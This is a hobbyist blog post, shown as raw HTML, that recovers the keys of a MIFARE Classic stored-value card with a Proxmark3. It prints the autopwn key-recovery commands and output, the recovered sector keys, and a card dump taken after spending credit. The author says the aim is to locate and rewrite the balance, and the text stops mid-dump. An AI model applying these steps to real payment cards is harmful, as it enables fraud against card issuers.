<!DOCTYPE html>
<html lang="en">

  <!-- Head -->
  <head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">    <!-- Metadata, OpenGraph and Schema.org -->
    

    <!-- Standard metadata -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>Money Laundrying | fedemengo</title>
    <meta name="author" content="fedemengo  ">
    <meta name="description" content="">
    <meta name="keywords" content="jekyll, jekyll-theme, academic-website, portfolio-website">


    <!-- Bootstrap & MDB -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha256-DF7Zhf293AJxJNTmh5zhoYYIMs2oXitRfBjY+9L//AY=" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/mdbootstrap@4.20.0/css/mdb.min.css" integrity="sha256-jpjYvU3G3N6nrrBwXJoVEYI/0zw8htfFnhT9ljN3JJw=" crossorigin="anonymous">

    <!-- Fonts & Icons -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/academicons@1.9.1/css/academicons.min.css" integrity="sha256-i1+4qU2G2860dGGIOJscdC30s9beBXjFfzjWLjBRsBg=" crossorigin="anonymous">
    <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700|Roboto+Slab:100,300,400,500,700|Material+Icons">

    <!-- Code Syntax Highlighting -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/jwarby/jekyll-pygments-themes@master/github.css" media="" id="highlight_theme_light">

    <!-- Styles -->
    
    <link rel="shortcut icon" href="/assets/img/code.png">
    
    <link rel="stylesheet" href="/assets/css/main.css">
    <link rel="canonical" href="https://fedemengo.github.io/blog/2025/10/money-laundrying/">

    <!-- Dark Mode -->
    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/jwarby/jekyll-pygments-themes@master/native.css" media="none" id="highlight_theme_dark">

    <script src="/assets/js/theme.js"></script>
    <script src="/assets/js/dark_mode.js"></script>

    <!-- Online 3D Viewer -->
    <script src="/assets/js/o3dv/o3dv.min.js"></script>
    <script>
        OV.SetExternalLibLocation ('libs'); // tell the engine where to find the libs folder
        OV.Init3DViewerElements (); // init all viewers on the page
    </script>
    

  </head>

  <!-- Body -->
  <body class="fixed-top-nav sticky-bottom-footer">

    <!-- Header -->
    <header>

      <!-- Nav Bar -->
      <nav id="navbar" class="navbar navbar-light navbar-expand-sm fixed-top">
        <div class="container">
          <a class="navbar-brand title" href="/">fedemengo</a>
          <!-- Navbar Toggle -->
          <button class="navbar-toggler collapsed ml-auto" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
            <span class="sr-only">Toggle navigation</span>
            <span class="icon-bar top-bar"></span>
            <span class="icon-bar middle-bar"></span>
            <span class="icon-bar bottom-bar"></span>
          </button>

          <div class="collapse navbar-collapse text-right" id="navbarNav">
            <ul class="navbar-nav ml-auto flex-nowrap">

              <!-- About -->
              <li class="nav-item ">
                <a class="nav-link" href="/">about</a>
              </li>
              
              <!-- Blog -->
              <li class="nav-item active">
                <a class="nav-link" href="/blog/">blog<span class="sr-only">(current)</span></a>
              </li>

              <!-- Other pages -->
              <li class="nav-item ">
                <a class="nav-link" href="/links/">links</a>
              </li>

              <!-- Toogle theme mode -->
              <li class="toggle-container">
                <button id="light-toggle" title="Change theme">
                  <i class="fas fa-moon"></i>
                  <i class="fas fa-sun"></i>
                </button>
              </li>
            </ul>
          </div>
        </div>
      </nav>

      <!-- Scrolling Progress Bar -->
      <progress id="progress" value="0">
        <div class="progress-container">
          <span class="progress-bar"></span>
        </div>
      </progress>
    </header>


    <!-- Content -->
    <div class="container mt-5">
      <!-- _layouts/post.html -->

<div class="post">

  <header class="post-header">
    <h1 class="post-title">Money Laundrying</h1>
    <p class="post-meta">October 12, 2025</p>
    <p class="post-tags">
      <a href="/blog/2025"> <i class="fas fa-calendar fa-sm"></i> 2025 </a>

    </p>
  </header>

  <article class="post-content">
    <h2 id="intro">Intro</h2>

<p>It started with a stored-value card and a very simple question: if the official reader can update the balance, what is stopping me from talking to the same card and writing the same kind of bytes?</p>

<p>So I tried to understand how it worked. The plan was simple: read the card, spend a little, read it again, and compare the two dumps until the balance fell out. This is that little investigation, with just enough MIFARE Classic context to make the block reads, writes, and diffs make sense.</p>

<h2 id="card-discovery">Card discovery</h2>

<p>The first step was simply asking the Proxmark what kind of tag was in front of it. The important parts here are the UID, the detected card family, and the weak PRNG hint, which usually means the card is a good candidate for the standard MIFARE Classic tooling.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">[</span>usb] pm3 <span class="nt">--</span><span class="o">&gt;</span> hf search
 🕖  Searching <span class="k">for </span>ISO14443-A tag...
<span class="o">[=]</span> <span class="nt">----------</span> ISO14443-A Information <span class="nt">----------</span>
<span class="o">[</span>+]  UID: 6C 2F AC 83   <span class="o">(</span> ONUID, re-used <span class="o">)</span>
<span class="o">[</span>+] ATQA: 00 02
<span class="o">[</span>+]  SAK: 18 <span class="o">[</span>2]
<span class="o">[</span>+] Possible types:
<span class="o">[</span>+]    MIFARE Classic 4K
<span class="o">[=]</span>
<span class="o">[=]</span> Proprietary non iso14443-4 card found
<span class="o">[=]</span> RATS not supported
<span class="o">[</span>+] Prng detection..... weak

<span class="o">[</span>?] Hint: Try <span class="sb">`</span>hf mf info<span class="sb">`</span>


<span class="o">[</span>+] Valid ISO 14443-A tag found
</code></pre></div></div>

<h2 id="mifare-classic-layout">MIFARE Classic layout</h2>

<p>Before looking at the dump, it helps to keep the MIFARE Classic memory layout in mind. The card is split into sectors, each sector is split into blocks, and every block is 16 bytes. The keys are not attached to a single block: they belong to a whole sector.</p>

<p>For the dump below, the useful mental model is the MIFARE Classic 1K-style layout:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sector  global blocks  sector-local blocks  notes
------  -------------  -------------------  -----------------------------------------
0       0-3            0-3                  block 0 is the manufacturer block
1       4-7            0-3                  blocks 4-6 are data, block 7 is trailer
2       8-11           0-3                  blocks 8-10 are data, block 11 is trailer
...     ...            ...                  same pattern
15      60-63          0-3                  blocks 60-62 are data, block 63 is trailer
</code></pre></div></div>

<p>MIFARE Classic 4K cards extend this layout with more sectors. The first 32 sectors still have 4 blocks each; the larger sectors after that have 16 blocks each, with the last block of each sector still acting as the trailer. The dump I am looking at here only shows the first 16 sectors, so the simple 4-block-per-sector model is enough for the rest of this post.</p>

<p>So when the dump says <code class="language-plaintext highlighter-rouge">sec 2 | blk 8</code>, it means global block <code class="language-plaintext highlighter-rouge">8</code>, which is block <code class="language-plaintext highlighter-rouge">0</code> inside sector <code class="language-plaintext highlighter-rouge">2</code>. The last block of the sector is the sector trailer. For sector <code class="language-plaintext highlighter-rouge">2</code>, that is block <code class="language-plaintext highlighter-rouge">11</code>.</p>

<p>The sector trailer is special:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bytes 0..5    key A
bytes 6..8    access bits
byte  9       general purpose byte
bytes 10..15  key B
</code></pre></div></div>

<p>The access bits define what key is needed to read or write each block in that sector. In the common simple case, key A can read data blocks and key B can write them, while the trailer itself controls the keys and permissions. That is why the key table printed by <code class="language-plaintext highlighter-rouge">autopwn</code> shows one key A and one key B per sector trailer block:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Sec 2, trailer block 11:
key A = A49F68AB4733
key B = B4E109EC9C52
</code></pre></div></div>

<p>Those are the keys for the whole sector, not just block <code class="language-plaintext highlighter-rouge">11</code>. So for this card, any access to blocks <code class="language-plaintext highlighter-rouge">8</code>, <code class="language-plaintext highlighter-rouge">9</code>, and <code class="language-plaintext highlighter-rouge">10</code> depends on the sector <code class="language-plaintext highlighter-rouge">2</code> keys and the permissions encoded in the sector trailer.</p>

<p>In practice, the key choice comes from the trailer’s access bits:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>operation                  which key?
-------------------------  ----------------------------------------------------------
read a data block          whichever of key A or key B the access bits allow
write a data block         whichever of key A or key B the access bits allow
change sector permissions  authenticate to the trailer with a key allowed to write it
change key A or key B      write the sector trailer, not the data blocks
</code></pre></div></div>

<p>As a rule of thumb: data lives in the data blocks, permissions and keys live in the trailer. Trailer blocks can be rewritten like any other block, as long as the current access bits allow it. The catch is that once a trailer is overwritten, the new keys and access bits immediately define what can be read or written next, so a bad trailer write can lock you out of the sector with the keys you have.</p>

<p>With that layout in mind, <code class="language-plaintext highlighter-rouge">hf mf info</code> gives a compact summary of the card and checks whether any obvious default keys work. In this case, sector 0 is readable with the default <code class="language-plaintext highlighter-rouge">FFFFFFFFFFFF</code> key, which is enough to get started.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">[</span>usb] pm3 <span class="nt">--</span><span class="o">&gt;</span> hf mf info

<span class="o">[=]</span> <span class="nt">---</span> ISO14443-a Information <span class="nt">-----------------------------</span>
<span class="o">[</span>+]  UID: 6C 2F AC 83
<span class="o">[</span>+] ATQA: 00 02
<span class="o">[</span>+]  SAK: 18 <span class="o">[</span>1]

<span class="o">[=]</span> <span class="nt">---</span> Keys Information
<span class="o">[</span>+] loaded 2 user keys
<span class="o">[</span>+] loaded 61 hardcoded keys
<span class="o">[</span>+] Sector 0 key A... FFFFFFFFFFFF
<span class="o">[</span>+] Sector 0 key B... FFFFFFFFFFFF
<span class="o">[</span>+] Backdoor key..... same as key A/B
<span class="o">[</span>+] Block 0.......... 6C2FAC836C980200E08E3D1955102213 | .<span class="o">=</span>.U.<span class="se">\"</span><span class="nb">.</span>

<span class="o">[=]</span> <span class="nt">---</span> Fingerprint
<span class="o">[</span>+] n/a

<span class="o">[=]</span> <span class="nt">---</span> Magic Tag Information
<span class="o">[=]</span> &lt;n/a&gt;

<span class="o">[=]</span> <span class="nt">---</span> PRNG Information
<span class="o">[</span>+] Prng....... weak
</code></pre></div></div>

<p>Before touching the card, I took note of the visible balance. This first snapshot is the baseline I want to recover from the binary dump.</p>

<figure>

  <picture>
    
    <source class="responsive-img-srcset" media="(max-width: 480px)" srcset="/assets/img/blog/2025-10-12/1250-480.webp"></source>
    <source class="responsive-img-srcset" media="(max-width: 800px)" srcset="/assets/img/blog/2025-10-12/1250-800.webp"></source>
    <source class="responsive-img-srcset" media="(max-width: 1400px)" srcset="/assets/img/blog/2025-10-12/1250-1400.webp"></source>
    

    <!-- Fallback to the original file -->
    <img src="/assets/img/blog/2025-10-12/1250.png" class="img-fluid centered" width="auto" height="auto" data-zoomable="" onerror="this.onerror=null; $('.responsive-img-srcset').remove();">

  </picture><figcaption class="caption">Initial credit value: 12.50</figcaption>

</figure>

<p>The next step was to recover enough sector keys to read the full memory. <code class="language-plaintext highlighter-rouge">autopwn</code> tries the usual MIFARE Classic attacks and dictionaries, then prints a useful table: one row per sector trailer, with the recovered key A and key B for that sector. It also dumps the card at the end, so this gives me the first binary snapshot of the card at <code class="language-plaintext highlighter-rouge">12.50</code>.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">[</span>usb] pm3 <span class="nt">--</span><span class="o">&gt;</span> hf mf autopwn

<span class="o">[!]</span> ⚠️   Known key failed. Can<span class="se">\'</span>t authenticate to block   0 key <span class="nb">type </span>A
<span class="o">[!]</span> ⚠️   No known key was supplied, key recovery might fail
<span class="o">[</span>+] loaded 5 user keys
<span class="o">[</span>+] loaded 61 hardcoded keys
<span class="o">[=]</span> Running strategy 1
<span class="o">[=]</span> Running strategy 2
<span class="o">[=]</span> <span class="nb">.</span>
<span class="o">[</span>+] Target sector   0 key <span class="nb">type </span>A <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span> <span class="o">(</span>used <span class="k">for </span>nested / hardnested attack<span class="o">)</span>
<span class="o">[</span>+] Target sector   0 key <span class="nb">type </span>B <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector   3 key <span class="nb">type </span>A <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector   3 key <span class="nb">type </span>B <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector   4 key <span class="nb">type </span>A <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector   4 key <span class="nb">type </span>B <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector   5 key <span class="nb">type </span>A <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector   5 key <span class="nb">type </span>B <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector   6 key <span class="nb">type </span>A <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector   6 key <span class="nb">type </span>B <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector   7 key <span class="nb">type </span>A <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector   7 key <span class="nb">type </span>B <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector   8 key <span class="nb">type </span>A <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector   8 key <span class="nb">type </span>B <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector   9 key <span class="nb">type </span>A <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector   9 key <span class="nb">type </span>B <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector  10 key <span class="nb">type </span>A <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector  10 key <span class="nb">type </span>B <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector  11 key <span class="nb">type </span>A <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector  11 key <span class="nb">type </span>B <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector  12 key <span class="nb">type </span>A <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector  12 key <span class="nb">type </span>B <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector  13 key <span class="nb">type </span>A <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector  13 key <span class="nb">type </span>B <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector  14 key <span class="nb">type </span>A <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector  14 key <span class="nb">type </span>B <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector  15 key <span class="nb">type </span>A <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>
<span class="o">[</span>+] Target sector  15 key <span class="nb">type </span>B <span class="nt">--</span> found valid key <span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span>

<span class="o">[</span>+] Found 1 key candidate
<span class="o">[</span>+] Target block    4 key <span class="nb">type </span>A <span class="nt">--</span> found valid key <span class="o">[</span> A71A0C3102FD <span class="o">]</span>
<span class="o">[</span>+] Target sector   1 key <span class="nb">type </span>A <span class="nt">--</span> found valid key <span class="o">[</span> A71A0C3102FD <span class="o">]</span>

<span class="o">[</span>+] Found 1 key candidate
<span class="o">[</span>+] Target block    4 key <span class="nb">type </span>B <span class="nt">--</span> found valid key <span class="o">[</span> B76198135BD9 <span class="o">]</span>
<span class="o">[</span>+] Target sector   1 key <span class="nb">type </span>B <span class="nt">--</span> found valid key <span class="o">[</span> B76198135BD9 <span class="o">]</span>

<span class="o">[</span>+] Found 1 key candidate
<span class="o">[</span>+] Target block    8 key <span class="nb">type </span>A <span class="nt">--</span> found valid key <span class="o">[</span> A49F68AB4733 <span class="o">]</span>
<span class="o">[</span>+] Target sector   2 key <span class="nb">type </span>A <span class="nt">--</span> found valid key <span class="o">[</span> A49F68AB4733 <span class="o">]</span>

<span class="o">[</span>+] Target block    8 key <span class="nb">type </span>B
<span class="o">[</span>-] ⛔ Nested attack failed, trying again <span class="o">(</span>1/6<span class="o">)</span>
<span class="o">[</span>+] Found 1 key candidate
<span class="o">[</span>+] Target block    8 key <span class="nb">type </span>B <span class="nt">--</span> found valid key <span class="o">[</span> B4E109EC9C52 <span class="o">]</span>
<span class="o">[</span>+] Target sector   2 key <span class="nb">type </span>B <span class="nt">--</span> found valid key <span class="o">[</span> B4E109EC9C52 <span class="o">]</span>

<span class="o">[</span>+] <span class="nt">-----</span>+-----+--------------+---+--------------+----
<span class="o">[</span>+]  Sec | Blk | key A        |res| key B        |res
<span class="o">[</span>+] <span class="nt">-----</span>+-----+--------------+---+--------------+----
<span class="o">[</span>+]  000 | 003 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  001 | 007 | A71A0C3102FD | N | B76198135BD9 | N
<span class="o">[</span>+]  002 | 011 | A49F68AB4733 | N | B4E109EC9C52 | N
<span class="o">[</span>+]  003 | 015 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  004 | 019 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  005 | 023 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  006 | 027 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  007 | 031 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  008 | 035 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  009 | 039 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  010 | 043 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  011 | 047 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  012 | 051 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  013 | 055 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  014 | 059 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  015 | 063 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+] <span class="nt">-----</span>+-----+--------------+---+--------------+----
<span class="o">[=]</span> <span class="o">(</span> D:Dictionary / S:darkSide / U:User / R:Reused / N:Nested / H:Hardnested / C:statiCnested / A:keyA  <span class="o">)</span>


<span class="o">[</span>+] Generating binary key file
<span class="o">[</span>+] Found keys have been dumped to <span class="sb">`</span>~/hf-mf-6C2FAC83-key.bin<span class="sb">`</span>
<span class="o">[=]</span> <span class="nt">--</span><span class="o">[</span> FFFFFFFFFFFF <span class="o">]</span><span class="nt">--</span> has been inserted <span class="k">for </span>unknown keys where res is 0
<span class="o">[=]</span> Transferring keys to simulator memory <span class="o">(</span> ok <span class="o">)</span>
<span class="o">[=]</span> Dumping card content to emulator memory <span class="o">(</span>Cmd Error: 04 can occur<span class="o">)</span>
<span class="o">[=]</span> downloading card content from emulator memory
<span class="o">[</span>+] Saved 1024 bytes to binary file <span class="sb">`</span>~/hf-mf-6C2FAC83-dump.bin<span class="sb">`</span>
<span class="o">[</span>+] Saved to json file ~/hf-mf-6C2FAC83-dump.json
<span class="o">[=]</span> Autopwn execution <span class="nb">time</span>: 9 seconds
</code></pre></div></div>

<p>Then I used the card normally and spent some credit. The visible balance moved from <code class="language-plaintext highlighter-rouge">12.50</code> to <code class="language-plaintext highlighter-rouge">9.00</code>, which gives me a clean before/after pair to compare.</p>

<figure>

  <picture>
    
    <source class="responsive-img-srcset" media="(max-width: 480px)" srcset="/assets/img/blog/2025-10-12/0900-480.webp"></source>
    <source class="responsive-img-srcset" media="(max-width: 800px)" srcset="/assets/img/blog/2025-10-12/0900-800.webp"></source>
    <source class="responsive-img-srcset" media="(max-width: 1400px)" srcset="/assets/img/blog/2025-10-12/0900-1400.webp"></source>
    

    <!-- Fallback to the original file -->
    <img src="/assets/img/blog/2025-10-12/0900.png" class="img-fluid centered" width="auto" height="auto" data-zoomable="" onerror="this.onerror=null; $('.responsive-img-srcset').remove();">

  </picture><figcaption class="caption">Credit value after payment: 9.00</figcaption>

</figure>

<p>After spending, I dumped the card again with the keys recovered by <code class="language-plaintext highlighter-rouge">autopwn</code>. This is the second data snapshot: each row is a 16-byte block, with the sector number on the left and the global block number next to it.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="o">[</span>usb] pm3 <span class="nt">--</span><span class="o">&gt;</span> hf mf dump
<span class="o">[</span>+] Loaded binary key file <span class="sb">`</span>~/hf-mf-6C2FAC83-key.bin<span class="sb">`</span>
<span class="o">[=]</span> Reading sector access bits...
<span class="o">[=]</span> .................
<span class="o">[</span>+] Finished reading sector access bits
<span class="o">[=]</span> Dumping all blocks from card...
 🕙 Sector... 15 block... 3 <span class="o">(</span> ok <span class="o">)</span>
<span class="o">[</span>+] Succeeded <span class="k">in </span>dumping all blocks

<span class="o">[</span>+] <span class="nb">time</span>: 11 seconds


<span class="o">[=]</span> <span class="nt">-----</span>+-----+-------------------------------------------------+-----------------
<span class="o">[=]</span>  sec | blk | data                                            | ascii
<span class="o">[=]</span> <span class="nt">-----</span>+-----+-------------------------------------------------+-----------------
<span class="o">[=]</span>    0 |   0 | 6C 2F AC 83 6C 98 02 00 E0 8E 3D 19 55 10 22 13 | l/..l.....<span class="o">=</span>.U.<span class="se">\"</span><span class="nb">.</span>
<span class="o">[=]</span>      |   1 | 7B 00 26 88 26 88 00 00 00 00 00 00 00 00 00 00 | <span class="o">{</span>.&amp;.&amp;...........
<span class="o">[=]</span>      |   2 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |   3 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
<span class="o">[=]</span>    1 |   4 | 00 00 71 01 00 00 01 01 03 01 00 00 00 00 00 4E | ..q............N
<span class="o">[=]</span>      |   5 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0B | ................
<span class="o">[=]</span>      |   6 | 92 B3 D9 34 00 00 00 00 00 00 00 00 FB 01 00 16 | .4...........
<span class="o">[=]</span>      |   7 | A7 1A 0C 31 02 FD 78 77 88 00 B7 61 98 13 5B D9 | ...1..xw...a..[.
<span class="o">[=]</span>    2 |   8 | 84 03 00 00 7B FC FF FF 84 03 00 00 09 F6 09 F6 | ....<span class="o">{</span>........
<span class="o">[=]</span>      |   9 | 84 03 00 00 7B FC FF FF 84 03 00 00 09 F6 09 F6 | ....<span class="o">{</span>........
<span class="o">[=]</span>      |  10 | 00 00 00 00 FF FF FF FF 00 00 00 00 0A F5 0A F5 | ..............
<span class="o">[=]</span>      |  11 | A4 9F 68 AB 47 33 08 77 8F 00 B4 E1 09 EC 9C 52 | ..h.G3.w.......R
<span class="o">[=]</span>    3 |  12 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  13 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  14 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  15 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
<span class="o">[=]</span>    4 |  16 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  17 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  18 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  19 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
<span class="o">[=]</span>    5 |  20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  21 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  22 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  23 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
<span class="o">[=]</span>    6 |  24 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  25 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  26 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  27 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
<span class="o">[=]</span>    7 |  28 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  29 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  31 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
<span class="o">[=]</span>    8 |  32 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  33 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  34 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  35 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
<span class="o">[=]</span>    9 |  36 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  37 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  38 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  39 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
<span class="o">[=]</span>   10 |  40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  41 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  42 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  43 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
<span class="o">[=]</span>   11 |  44 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  45 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  46 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  47 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
<span class="o">[=]</span>   12 |  48 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  49 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  51 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
<span class="o">[=]</span>   13 |  52 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  53 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  54 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  55 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
<span class="o">[=]</span>   14 |  56 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
<span class="o">[=]</span>      |  57 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
